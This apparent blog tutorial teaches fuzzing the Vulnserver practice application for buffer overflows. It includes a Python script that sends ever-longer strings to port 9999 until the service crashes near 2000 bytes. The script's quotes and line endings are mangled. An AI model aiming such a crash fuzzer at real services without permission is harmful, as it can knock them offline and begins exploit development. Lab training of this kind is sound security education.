Greeting Everyone! Today we will learn how to perform fuzzing as our previous blog we discussed Basic structure of buffer overflow today in this blog we will start from fuzzing with suitable example .
What is Fuzzing?
Fuzzing is automated script where it is send continuously bytes to vulnerable application to check application is vulnerable of buffer overflow or not.
Vulnserver is running on port number 9999
Python Code For Fuzzing :-
- #!/usr/bin/python
- import socket, time, sys
- ip = “172.16.0.10”
- port = 9999
- timeout = 5
- buffer = []
- counter = 100
- while len(buffer) < 30:
- buffer.append(“A” * counter)
- counter += 100
- for string in buffer:
- try:
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.settimeout(timeout)
- connect = s.connect((ip, port))
- s.recv(1024)
- print(“Fuzzing with %s bytes” % len(string))
- s.send(“OVERFLOW1 ” + string + “rn”)
- s.recv(1024)
- s.close()
- except:
- print(“Could not connect to ” + ip + “:” + str(port))
- sys.exit(0)
- time.sleep(1)
As Above we run the script and script started sending packet continuously towards vulnserver. Here we monitor script stopped on 2000 bytes because vulnserver stopped responding.
Below I attached both screenshot one of script response and second of vulnserver status.
FUZZINGNow Another screen it paused as our Vulnerable software is running on Immunity Debugger ,
As above Example Scenario We discussed How fuzzing work How we can validate buffer size using fuzzing with Python script
In this Fuzzing section we learn how to write script and perform fuzzing on application to find the buffer overflow vulnerability.
Thanks For Reading……. See You In Another Blog!
Stick With Our Blog: Click Here
Author
Shubham Jaiswal
WEB VAPT (Intern)
